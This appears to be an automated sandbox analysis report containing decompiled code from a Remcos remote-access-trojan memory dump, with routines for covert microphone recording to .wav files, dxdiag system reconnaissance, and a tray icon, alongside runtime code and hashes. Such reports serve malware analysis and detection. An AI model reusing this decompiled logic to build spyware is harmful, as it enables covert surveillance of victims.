                    						E00402EF0(_t55, _t93 - 0x18, _t49, _t92, _t100,  &_v28);
                    						_push(0x97);
                    						E00404A81( &_v204, _t49, _t100);
                    						E00401FB8();
                    						E00404E06(_t88);
                    						_t55 = 1;
                    					}
                    					E00404EC2(_t55,  &_v204, _t88, _t91);
                    				}
                    				E00401FB8();
                    				E00401EE9();
                    				E00401FB8();
                    				return _t55;
                    			}

















                    APIs
                    • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004164F5
                      • Part of subcall function 0041ADFE: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409DB6), ref: 0041AE17
                    • Sleep.KERNEL32(00000064), ref: 00416521
                    • DeleteFileW.KERNEL32(00000000), ref: 00416555
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CreateDeleteExecuteShellSleep
                    • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                    • API String ID: 1462127192-2001430897
                    • Opcode ID: 46e828569e7d77b8fddcfad18c7167f4945a1032a4b3dda26623b2653208be0e
                    • Instruction ID: c83c678f58a6655289b5cf6a6ce0edad258ffa977a2a4ba52374f317f639f8dc
                    • Opcode Fuzzy Hash: 46e828569e7d77b8fddcfad18c7167f4945a1032a4b3dda26623b2653208be0e
                    • Instruction Fuzzy Hash: F23150719401095ACB04FBA1DC96EEE7779AF50309F40017FF506731D2EE78598ACA9D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E00401CEB(void* __ebx, void* __edx, void* __edi, intOrPtr _a8) {
                    				char _v84;
                    				char _v112;
                    				void* _v116;
                    				char _v136;
                    				void* _v140;
                    				char _v160;
                    				void* _v164;
                    				char _v184;
                    				void* _v188;
                    				char _v204;
                    				char _v208;
                    				void* _v212;
                    				char _v228;
                    				char _v232;
                    				char _v236;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t29;
                    				intOrPtr _t43;
                    				void* _t76;
                    				void* _t79;
                    
                    				_t47 = __ebx;
                    				_push(_t76);
                    				E00401F66(__ebx,  &_v228);
                    				_t84 = _a8 - 0x3c0;
                    				if(_a8 == 0x3c0) {
                    					E004016E7();
                    					E00439269( &_v84, 0x50, "%Y-%m-%d %H.%M", E004016DF());
                    					E00402073(__ebx,  &_v204, __edx, _t79,  &_v84);
                    					_push(L".wav");
                    					_t29 = E0041A7B9( &_v112,  &_v208);
                    					E00401EF3( &_v232, _t31, _t76, E00402FF4(_t47,  &_v184, E00402F85( &_v160, E00402F52(__ebx,  &_v136, 0x472d40, _t79), 0x5c), __edi, _t79, _t84, _t29));
                    					E00401EE9();
                    					E00401EE9();
                    					E00401EE9();
                    					E00401EE9();
                    					E00401FB8();
                    					E00401A4D(E00401EE4( &_v236), 0x470a88);
                    					waveInUnprepareHeader( *0x470ac0, 0x470a88, 0x20);
                    					0x470a88->lpData = E00401F8B(0x472d58);
                    					_t43 =  *0x470ac4; // 0x0
                    					 *0x470a8c = _t43;
                    					 *0x470a90 = 0;
                    					 *0x470a94 = 0;
                    					 *0x470a98 = 0;
                    					 *0x470a9c = 0;
                    					waveInPrepareHeader( *0x470ac0, 0x470a88, 0x20);
                    					waveInAddBuffer( *0x470ac0, 0x470a88, 0x20);
                    				}
                    				return E00401EE9();
                    			}

























                    APIs
                    • _strftime.LIBCMT ref: 00401D30
                      • Part of subcall function 00401A4D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
                    • waveInUnprepareHeader.WINMM(00470A88,00000020,00000000,?), ref: 00401DE2
                    • waveInPrepareHeader.WINMM(00470A88,00000020), ref: 00401E20
                    • waveInAddBuffer.WINMM(00470A88,00000020), ref: 00401E2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                    • String ID: %Y-%m-%d %H.%M$.wav$@-G$X-G
                    • API String ID: 3809562944-1740755071
                    • Opcode ID: e4cb62501303fc430a5ba33d69337f3bc3674b94e0793f0edbbf08350351de76
                    • Instruction ID: 6e40445bcf9654caa432548e7993fb83a4077dca951e3b59059cc53d3c4022e6
                    • Opcode Fuzzy Hash: e4cb62501303fc430a5ba33d69337f3bc3674b94e0793f0edbbf08350351de76
                    • Instruction Fuzzy Hash: 13317E315053019BC314FB66DC46A9E77E8EB94304F00893EF549A21F2EF789A49CB9E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 92%
                    			E004103A4(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
                    				void* _v8;
                    				char _v12;
                    				char _v24;
                    				void* __esi;
                    				intOrPtr _t40;
                    				void* _t48;
                    				intOrPtr* _t51;
                    
                    				E00433BCB( &_v12, 0);
                    				_t48 =  *0x474a74;
                    				_v8 = _t48;
                    				_t51 = E0040D696(_a4, E0040D5C5(0x470140));
                    				if(_t51 != 0) {
                    					L5:
                    					E00433C23( &_v12);
                    					return _t51;
                    				} else {
                    					if(_t48 == 0) {
                    						__eflags = E0040D7AD(__ebx, __edx,  &_v8, _a4) - 0xffffffff;
                    						if(__eflags == 0) {
                    							E0040D491( &_v24);
                    							E004379F6( &_v24, 0x46cd4c);
                    							asm("int3");
                    							_t40 =  *((intOrPtr*)( *[fs:0x2c]));
                    							__eflags =  *0x474a68 -  *((intOrPtr*)(_t40 + 4));
                    							if( *0x474a68 >  *((intOrPtr*)(_t40 + 4))) {
                    								_push(_t51);
                    								E00432CF1(0x474a68);
                    								__eflags =  *0x474a68 - 0xffffffff;
                    								if( *0x474a68 == 0xffffffff) {
                    									E0041074B();
                    									E0043307B(__eflags, 0x456962);
                    									E00432CB2(0x474a68, 0x474a68);
                    								}
                    							}
                    							return 0x474a6c;
                    						} else {
                    							_t51 = _v8;
                    							 *0x474a74 = _t51;
                    							 *((intOrPtr*)( *_t51 + 4))();
                    							E00433DDC(__eflags, _t51);
                    							goto L5;
                    						}
                    					} else {
                    						_t51 = _t48;
                    						goto L5;
                    					}
                    				}
                    			}

                    APIs
                    • std::_Lockit::_Lockit.LIBCPMT ref: 004103B1
                    • int.LIBCPMT ref: 004103C4
                      • Part of subcall function 0040D5C5: std::_Lockit::_Lockit.LIBCPMT ref: 0040D5D6
                      • Part of subcall function 0040D5C5: std::_Lockit::~_Lockit.LIBCPMT ref: 0040D5F0
                    • std::_Facet_Register.LIBCPMT ref: 00410404
                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0041040D
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041042B
                    • __Init_thread_footer.LIBCMT ref: 0041046C
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                    • String ID: hJG$lJG
                    • API String ID: 3815856325-3986032958
                    • Opcode ID: d4a0570ecbcf5ece8d5908e1c3d22f52c6d87fbfb43144eaa5cda1b4a7bc5fbd
                    • Instruction ID: 6c6f380f6bf393aa298e891036efe52b613f3523a9b97c737d9d060c2d8c6b16
                    • Opcode Fuzzy Hash: d4a0570ecbcf5ece8d5908e1c3d22f52c6d87fbfb43144eaa5cda1b4a7bc5fbd
                    • Instruction Fuzzy Hash: 232108329402149BC710EBA9C9819EE73A89F84324F20466FF915A72D1DF7CAEC1C79D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0041BD68(void* __eflags) {
                    				struct tagMSG _v32;
                    				char _v300;
                    				int _t14;
                    
                    				GetModuleFileNameA(0,  &_v300, 0x104);
                    				 *0x472b24 = E0041BE1A();
                    				0x472b20->cbSize = 0x1fc;
                    				 *0x472b28 = 1;
                    				 *0x472b30 = 0x401;
                    				 *0x472b34 = ExtractIconA(0,  &_v300, 0);
                    				lstrcpynA(0x472b38, "Remcos", 0x80);
                    				 *0x472b2c = 7;
                    				Shell_NotifyIconA(0, 0x472b20);
                    				while(1) {
                    					_t14 = GetMessageA( &_v32, 0, 0, 0);
                    					if(_t14 == 0) {
                    						break;
                    					}
                    					TranslateMessage( &_v32);
                    					DispatchMessageA( &_v32);
                    				}
                    				return _t14;
                    			}

                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041BD81
                      • Part of subcall function 0041BE1A: RegisterClassExA.USER32(00000030), ref: 0041BE66
                      • Part of subcall function 0041BE1A: CreateWindowExA.USER32 ref: 0041BE81
                      • Part of subcall function 0041BE1A: GetLastError.KERNEL32 ref: 0041BE8B
                    • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041BDB8
                    • lstrcpynA.KERNEL32(00472B38,Remcos,00000080), ref: 0041BDD2
                    • Shell_NotifyIconA.SHELL32(00000000,00472B20), ref: 0041BDE8
                    • TranslateMessage.USER32(?), ref: 0041BDF4
                    • DispatchMessageA.USER32 ref: 0041BDFE
                    • GetMessageA.USER32 ref: 0041BE0B
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                    • String ID: Remcos
                    • API String ID: 1970332568-165870891
                    • Opcode ID: 2d143759cf1fb37759ec7f404772a1ad4e1485a2e1ecf97a8841056aeb74ba0a
                    • Instruction ID: 82a48a2e9b81ede311839844b2886800dd1b811866fb10484f52e0710d5afa0d
                    • Opcode Fuzzy Hash: 2d143759cf1fb37759ec7f404772a1ad4e1485a2e1ecf97a8841056aeb74ba0a
                    • Instruction Fuzzy Hash: BB013C71404304ABD7109FA1EE08EDB7BBCEB45715F00407AFA0492161D7B8A085CB6C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 77%
                    			E0044B600(signed int _a4, void* _a8, unsigned int _a12) {
                    				signed int _v5;
                    				char _v6;
                    				void* _v12;
                    				unsigned int _v16;
                    				signed int _v20;
                    				signed int _v24;
                    				signed int _v28;
                    				void* _v32;
                    				long _v36;
                    				void* _v40;
                    				long _v44;
                    				signed int* _t143;
                    				signed int _t145;
                    				intOrPtr _t149;
                    				signed int _t153;
                    				signed int _t155;
                    				signed char _t157;
                    				unsigned int _t158;
                    				intOrPtr _t162;
                    				void* _t163;
                    				signed int _t164;
                    				signed int _t167;
                    				long _t168;
                    				intOrPtr _t175;
                    				signed int _t176;
                    				intOrPtr _t178;
                    				signed int _t180;
                    				signed int _t184;
                    				char _t191;
                    				char* _t192;
                    				char _t199;
                    				char* _t200;
                    				signed char _t211;
                    				signed int _t213;
                    				long _t215;
                    				signed int _t216;
                    				char _t218;
                    				signed char _t222;
                    				signed int _t223;
                    				unsigned int _t224;
                    				intOrPtr _t225;
                    				unsigned int _t229;
                    				signed int _t231;
                    				signed int _t232;
                    				signed int _t233;
                    				signed int _t234;
                    				signed int _t235;
                    				signed char _t236;
                    				signed int _t237;
                    				signed int _t239;
                    				signed int _t240;
                    				signed int _t241;
                    				signed int _t242;
                    				signed int _t246;
                    				void* _t248;
                    				void* _t249;
                    
                    				_t213 = _a4;
                    				if(_t213 != 0xfffffffe) {
                    					__eflags = _t213;
                    					if(_t213 < 0) {
                    						L58:
                    						_t143 = E0043EE9A();
                    						 *_t143 =  *_t143 & 0x00000000;
                    						__eflags =  *_t143;
                    						 *((intOrPtr*)(E0043EEAD())) = 9;
                    						L59:
                    						_t145 = E0043A5BB();
                    						goto L60;
                    					}
                    					__eflags = _t213 -  *0x470a10; // 0x40
                    					if(__eflags >= 0) {
                    						goto L58;
                    					}
                    					_v24 = 1;
                    					_t239 = _t213 >> 6;
                    					_t235 = (_t213 & 0x0000003f) * 0x30;
                    					_v20 = _t239;
                    					_t149 =  *((intOrPtr*)(0x470810 + _t239 * 4));
                    					_v28 = _t235;
                    					_t222 =  *((intOrPtr*)(_t235 + _t149 + 0x28));
                    					_v5 = _t222;
                    					__eflags = _t222 & 0x00000001;
                    					if((_t222 & 0x00000001) == 0) {
                    						goto L58;
                    					}
                    					_t223 = _a12;
                    					__eflags = _t223 - 0x7fffffff;
                    					if(_t223 <= 0x7fffffff) {
                    						__eflags = _t223;
                    						if(_t223 == 0) {
                    							L57:
                    							return 0;
                    						}
                    						__eflags = _v5 & 0x00000002;
                    						if((_v5 & 0x00000002) != 0) {
                    							goto L57;
                    						}
                    						__eflags = _a8;
                    						if(_a8 == 0) {
                    							goto L6;
                    						}
                    						_t153 =  *((intOrPtr*)(_t235 + _t149 + 0x29));
                    						_v5 = _t153;
                    						_v32 =  *((intOrPtr*)(_t235 + _t149 + 0x18));
                    						_t246 = 0;
                    						_t155 = _t153 - 1;
                    						__eflags = _t155;
                    						if(_t155 == 0) {
                    							_t236 = _v24;
                    							_t157 =  !_t223;
                    							__eflags = _t236 & _t157;
                    							if((_t236 & _t157) != 0) {
                    								_t158 = 4;
                    								_t224 = _t223 >> 1;
                    								_v16 = _t158;
                    								__eflags = _t224 - _t158;
                    								if(_t224 >= _t158) {
                    									_t158 = _t224;
                    									_v16 = _t224;
                    								}
                    								_t246 = E00444A38(_t224, _t158);
                    								E00445002(0);
                    								E00445002(0);
                    								_t249 = _t248 + 0xc;
                    								_v12 = _t246;
                    								__eflags = _t246;
                    								if(_t246 != 0) {
                    									_t162 = E0044AB6C(_t213, 0, 0, _v24);
                    									_t225 =  *((intOrPtr*)(0x470810 + _t239 * 4));
                    									_t248 = _t249 + 0x10;
                    									_t240 = _v28;
                    									 *((intOrPtr*)(_t240 + _t225 + 0x20)) = _t162;
                    									_t163 = _t246;
                    									 *(_t240 + _t225 + 0x24) = _t236;
                    									_t235 = _t240;
                    									_t223 = _v16;
                    									L21:
                    									_t241 = 0;
                    									_v40 = _t163;
                    									_t215 =  *((intOrPtr*)(0x470810 + _v20 * 4));
                    									_v36 = _t215;
                    									__eflags =  *(_t235 + _t215 + 0x28) & 0x00000048;
                    									_t216 = _a4;
                    									if(( *(_t235 + _t215 + 0x28) & 0x00000048) != 0) {
                    										_t218 =  *((intOrPtr*)(_t235 + _v36 + 0x2a));
                    										_v6 = _t218;
                    										__eflags = _t218 - 0xa;
                    										_t216 = _a4;
                    										if(_t218 != 0xa) {
                    											__eflags = _t223;
                    											if(_t223 != 0) {
                    												_t241 = _v24;
                    												 *_t163 = _v6;
                    												_t216 = _a4;
                    												_t232 = _t223 - 1;
                    												__eflags = _v5;
                    												_v12 = _t163 + 1;
                    												_v16 = _t232;
                    												 *((char*)(_t235 +  *((intOrPtr*)(0x470810 + _v20 * 4)) + 0x2a)) = 0xa;
                    												if(_v5 != 0) {
                    													_t191 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x470810 + _v20 * 4)) + 0x2b));
                    													_v6 = _t191;
                    													__eflags = _t191 - 0xa;
                    													if(_t191 != 0xa) {
                    														__eflags = _t232;
                    														if(_t232 != 0) {
                    															_t192 = _v12;
                    															_t241 = 2;
                    															 *_t192 = _v6;
                    															_t216 = _a4;
                    															_t233 = _t232 - 1;
                    															_v12 = _t192 + 1;
                    															_v16 = _t233;
                    															 *((char*)(_t235 +  *((intOrPtr*)(0x470810 + _v20 * 4)) + 0x2b)) = 0xa;
                    															__eflags = _v5 - _v24;
                    															if(_v5 == _v24) {
                    																_t199 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x470810 + _v20 * 4)) + 0x2c));
                    																_v6 = _t199;
                    																__eflags = _t199 - 0xa;
                    																if(_t199 != 0xa) {
                    																	__eflags = _t233;
                    																	if(_t233 != 0) {
                    																		_t200 = _v12;
                    																		_t241 = 3;
                    																		 *_t200 = _v6;
                    																		_t216 = _a4;
                    																		_t234 = _t233 - 1;
                    																		__eflags = _t234;
                    																		_v12 = _t200 + 1;
                    																		_v16 = _t234;
                    																		 *((char*)(_t235 +  *((intOrPtr*)(0x470810 + _v20 * 4)) + 0x2c)) = 0xa;
                    																	}
                    																}
                    															}
                    														}
                    													}
                    												}
                    											}
                    										}
                    									}
                    									_t164 = E00453DF6(_t216);
                    									__eflags = _t164;
                    									if(_t164 == 0) {
                    										L41:
                    										_v24 = 0;
                    										L42:
                    										_t167 = ReadFile(_v32, _v12, _v16,  &_v36, 0);
                    										__eflags = _t167;
                    										if(_t167 == 0) {
                    											L53:
                    											_t168 = GetLastError();
                    											_t241 = 5;
                    											__eflags = _t168 - _t241;
                    											if(_t168 != _t241) {
                    												__eflags = _t168 - 0x6d;
                    												if(_t168 != 0x6d) {
                    													L37:
                    													E0043EE77(_t168);
                    													goto L38;
                    												}
                    												_t242 = 0;
                    												goto L39;
                    											}
                    											 *((intOrPtr*)(E0043EEAD())) = 9;
                    											 *(E0043EE9A()) = _t241;
                    											goto L38;
                    										}
                    										_t229 = _a12;
                    										__eflags = _v36 - _t229;
                    										if(_v36 > _t229) {
                    											goto L53;
                    										}
                    										_t242 = _t241 + _v36;
                    										__eflags = _t242;
                    										L45:
                    										_t237 = _v28;
                    										_t175 =  *((intOrPtr*)(0x470810 + _v20 * 4));
                    										__eflags =  *(_t237 + _t175 + 0x28) & 0x00000080;
                    										if(( *(_t237 + _t175 + 0x28) & 0x00000080) != 0) {
                    											__eflags = _v5 - 2;
                    											if(_v5 == 2) {
                    												__eflags = _v24;
                    												_push(_t242 >> 1);
                    												_push(_v40);
                    												_push(_t216);
                    												if(_v24 == 0) {
                    													_t176 = E0044B15C();
                    												} else {
                    													_t176 = E0044B46C();
                    												}
                    											} else {
                    												_t230 = _t229 >> 1;
                    												__eflags = _t229 >> 1;
                    												_t176 = E0044B31C(_t229 >> 1, _t229 >> 1, _t216, _v12, _t242, _a8, _t230);
                    											}
                    											_t242 = _t176;
                    										}
                    										goto L39;
                    									}
                    									_t231 = _v28;
                    									_t178 =  *((intOrPtr*)(0x470810 + _v20 * 4));
                    									__eflags =  *(_t231 + _t178 + 0x28) & 0x00000080;
                    									if(( *(_t231 + _t178 + 0x28) & 0x00000080) == 0) {
                    										goto L41;
                    									}
                    									_t180 = GetConsoleMode(_v32,  &_v44);
                    									__eflags = _t180;
                    									if(_t180 == 0) {
                    										goto L41;
                    									}
                    									__eflags = _v5 - 2;
                    									if(_v5 != 2) {
                    										goto L42;
                    									}
                    									_t184 = ReadConsoleW(_v32, _v12, _v16 >> 1,  &_v36, 0);
                    									__eflags = _t184;
                    									if(_t184 != 0) {
                    										_t229 = _a12;
                    										_t242 = _t241 + _v36 * 2;
                    										goto L45;
                    									}
                    									_t168 = GetLastError();
                    									goto L37;
                    								} else {
                    									 *((intOrPtr*)(E0043EEAD())) = 0xc;
                    									 *(E0043EE9A()) = 8;
                    									L38:
                    									_t242 = _t241 | 0xffffffff;
                    									__eflags = _t242;
                    									L39:
                    									E00445002(_t246);
                    									return _t242;
                    								}
                    							}
                    							L15:
                    							 *(E0043EE9A()) =  *_t206 & _t246;
                    							 *((intOrPtr*)(E0043EEAD())) = 0x16;
                    							E0043A5BB();
                    							goto L38;
                    						}
                    						__eflags = _t155 != 1;
                    						if(_t155 != 1) {
                    							L13:
                    							_t163 = _a8;
                    							_v16 = _t223;
                    							_v12 = _t163;
                    							goto L21;
                    						}
                    						_t211 =  !_t223;
                    						__eflags = _t211 & 0x00000001;
                    						if((_t211 & 0x00000001) == 0) {
                    							goto L15;
                    						}
                    						goto L13;
                    					}
                    					L6:
                    					 *(E0043EE9A()) =  *_t151 & 0x00000000;
                    					 *((intOrPtr*)(E0043EEAD())) = 0x16;
                    					goto L59;
                    				} else {
                    					 *(E0043EE9A()) =  *_t212 & 0x00000000;
                    					_t145 = E0043EEAD();
                    					 *_t145 = 9;
                    					L60:
                    					return _t145 | 0xffffffff;
                    				}
                    			}

                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 56c92366c9c142871bd2cfac74ae2ca5b0ffb3cedc8e660afd08c35565e41f2e
                    • Instruction ID: bf7309e27d7813377405dfc29e16a9701e648260f6ca06a135f05bfcd2001108
                    • Opcode Fuzzy Hash: 56c92366c9c142871bd2cfac74ae2ca5b0ffb3cedc8e660afd08c35565e41f2e
                    • Instruction Fuzzy Hash: D2C108B0D04249AFEF11DFA9C841BAE7BB4EF09304F14409AE514A7392C778D941CBA9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 83%
                    			E00452603(void* __ebx, void* __edi, void* __esi, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, int _a20, char* _a24, int _a28, int _a32) {
                    				signed int _v8;
                    				char _v22;
                    				struct _cpinfo _v28;
                    				short* _v32;
                    				int _v36;
                    				char* _v40;
                    				int _v44;
                    				intOrPtr _v48;
                    				void* _v60;
                    				signed int _t63;
                    				int _t70;
                    				signed int _t72;
                    				short* _t73;
                    				signed int _t77;
                    				short* _t87;
                    				void* _t89;
                    				void* _t92;
                    				int _t99;
                    				intOrPtr _t101;
                    				intOrPtr _t102;
                    				signed int _t112;
                    				char* _t114;
                    				char* _t115;
                    				void* _t120;
                    				void* _t121;
                    				intOrPtr _t122;
                    				intOrPtr _t123;
                    				intOrPtr* _t125;
                    				short* _t126;
                    				int _t128;
                    				int _t129;
                    				short* _t130;
                    				intOrPtr* _t131;
                    				signed int _t132;
                    				short* _t133;
                    
                    				_t63 =  *0x46f00c; // 0x54ba778e
                    				_v8 = _t63 ^ _t132;
                    				_t128 = _a20;
                    				_v44 = _a4;
                    				_v48 = _a8;
                    				_t67 = _a24;
                    				_v40 = _a24;
                    				_t125 = _a16;
                    				_v36 = _t125;
                    				if(_t128 <= 0) {
                    					if(_t128 >= 0xffffffff) {
                    						goto L2;
                    					} else {
                    						goto L5;
                    					}
                    				} else {
                    					_t128 = E00444FE6(_t125, _t128);
                    					_t67 = _v40;
                    					L2:
                    					_t99 = _a28;
                    					if(_t99 <= 0) {
                    						if(_t99 < 0xffffffff) {
                    							goto L5;
                    						} else {
                    							goto L7;
                    						}
                    					} else {
                    						_t99 = E00444FE6(_t67, _t99);
                    						L7:
                    						_t70 = _a32;
                    						if(_t70 == 0) {
                    							_t70 =  *( *_v44 + 8);
                    							_a32 = _t70;
                    						}
                    						if(_t128 == 0 || _t99 == 0) {
                    							if(_t128 != _t99) {
                    								if(_t99 <= 1) {
                    									if(_t128 <= 1) {
                    										if(GetCPInfo(_t70,  &_v28) == 0) {
                    											goto L5;
                    										} else {
                    											if(_t128 <= 0) {
                    												if(_t99 <= 0) {
                    													goto L36;
                    												} else {
                    													_t89 = 2;
                    													if(_v28 >= _t89) {
                    														_t114 =  &_v22;
                    														if(_v22 != 0) {
                    															_t131 = _v40;
                    															while(1) {
                    																_t122 =  *((intOrPtr*)(_t114 + 1));
                    																if(_t122 == 0) {
                    																	goto L15;
                    																}
                    																_t101 =  *_t131;
                    																if(_t101 <  *_t114 || _t101 > _t122) {
                    																	_t114 = _t114 + _t89;
                    																	if( *_t114 != 0) {
                    																		continue;
                    																	} else {
                    																		goto L15;
                    																	}
                    																}
                    																goto L63;
                    															}
                    														}
                    													}
                    													goto L15;
                    												}
                    											} else {
                    												_t92 = 2;
                    												if(_v28 >= _t92) {
                    													_t115 =  &_v22;
                    													if(_v22 != 0) {
                    														while(1) {
                    															_t123 =  *((intOrPtr*)(_t115 + 1));
                    															if(_t123 == 0) {
                    																goto L17;
                    															}
                    															_t102 =  *_t125;
                    															if(_t102 <  *_t115 || _t102 > _t123) {
                    																_t115 = _t115 + _t92;
                    																if( *_t115 != 0) {
                    																	continue;
                    																} else {
                    																	goto L17;
                    																}
                    															}
                    															goto L63;
                    														}
                    													}
                    												}
                    												goto L17;
                    											}
                    										}
                    									} else {
                    										L17:
                    										_push(3);
                    										goto L13;
                    									}
                    								} else {
                    									L15:
                    								}
                    							} else {
                    								_push(2);
                    								L13:
                    							}
                    						} else {
                    							L36:
                    							_t126 = 0;
                    							_t72 = MultiByteToWideChar(_a32, 9, _v36, _t128, 0, 0);
                    							_v44 = _t72;
                    							if(_t72 == 0) {
                    								L5:
                    							} else {
                    								_t120 = _t72 + _t72;
                    								asm("sbb eax, eax");
                    								if((_t120 + 0x00000008 & _t72) == 0) {
                    									_t73 = 0;
                    									_v32 = 0;
                    									goto L45;
                    								} else {
                    									asm("sbb eax, eax");
                    									_t85 = _t72 & _t120 + 0x00000008;
                    									_t112 = _t120 + 8;
                    									if((_t72 & _t120 + 0x00000008) > 0x400) {
                    										asm("sbb eax, eax");
                    										_t87 = E00444A38(_t112, _t85 & _t112);
                    										_v32 = _t87;
                    										if(_t87 == 0) {
                    											goto L61;
                    										} else {
                    											 *_t87 = 0xdddd;
                    											goto L43;
                    										}
                    									} else {
                    										asm("sbb eax, eax");
                    										E00455A90();
                    										_t87 = _t133;
                    										_v32 = _t87;
                    										if(_t87 == 0) {
                    											L61:
                    											_t100 = _v32;
                    										} else {
                    											 *_t87 = 0xcccc;
                    											L43:
                    											_t73 =  &(_t87[4]);
                    											_v32 = _t73;
                    											L45:
                    											if(_t73 == 0) {
                    												goto L61;
                    											} else {
                    												_t129 = _a32;
                    												if(MultiByteToWideChar(_t129, 1, _v36, _t128, _t73, _v44) == 0) {
                    													goto L61;
                    												} else {
                    													_t77 = MultiByteToWideChar(_t129, 9, _v40, _t99, _t126, _t126);
                    													_v36 = _t77;
                    													if(_t77 == 0) {
                    														goto L61;
                    													} else {
                    														_t121 = _t77 + _t77;
                    														_t108 = _t121 + 8;
                    														asm("sbb eax, eax");
                    														if((_t121 + 0x00000008 & _t77) == 0) {
                    															_t130 = _t126;
                    															goto L56;
                    														} else {
                    															asm("sbb eax, eax");
                    															_t81 = _t77 & _t121 + 0x00000008;
                    															_t108 = _t121 + 8;
                    															if((_t77 & _t121 + 0x00000008) > 0x400) {
                    																asm("sbb eax, eax");
                    																_t130 = E00444A38(_t108, _t81 & _t108);
                    																_pop(_t108);
                    																if(_t130 == 0) {
                    																	goto L59;
                    																} else {
                    																	 *_t130 = 0xdddd;
                    																	goto L54;
                    																}
                    															} else {
                    																asm("sbb eax, eax");
                    																E00455A90();
                    																_t130 = _t133;
                    																if(_t130 == 0) {
                    																	L59:
                    																	_t100 = _v32;
                    																} else {
                    																	 *_t130 = 0xcccc;
                    																	L54:
                    																	_t130 =  &(_t130[4]);
                    																	L56:
                    																	if(_t130 == 0 || MultiByteToWideChar(_a32, 1, _v40, _t99, _t130, _v36) == 0) {
                    																		goto L59;
                    																	} else {
                    																		_t100 = _v32;
                    																		_t126 = E00446EAF(_t108, _t130, _v48, _a12, _v32, _v44, _t130, _v36, _t126, _t126, _t126);
                    																	}
                    																}
                    															}
                    														}
                    														E00434713(_t130);
                    													}
                    												}
                    											}
                    										}
                    									}
                    								}
                    								E00434713(_t100);
                    							}
                    						}
                    					}
                    				}
                    				L63:
                    				return E004338BB(_v8 ^ _t132);
                    			}

                    APIs
                    • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004528DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 004526AF
                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004528DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00452732
                    • __alloca_probe_16.LIBCMT ref: 0045276A
                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004528DC,?,004528DC,00000000,00000000,?,00000001,?,?,?,?), ref: 004527C5
                    • __alloca_probe_16.LIBCMT ref: 00452814
                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004528DC,00000000,00000000,?,00000001,?,?,?,?), ref: 004527DC
                      • Part of subcall function 00444A38: RtlAllocateHeap.NTDLL(00000000,00433B6F,?,P@,00437117,?,?,00000000,?,P@,0040D366,00433B6F,?,?,?,?), ref: 00444A6A
                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004528DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00452858
                    • __freea.LIBCMT ref: 00452883
                    • __freea.LIBCMT ref: 0045288F
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                    • String ID:
                    • API String ID: 201697637-0
                    • Opcode ID: 768b996481d749ff10557c4c7c1c0a01c42c9ac738d115a97dc7b4c5a44c3e6d
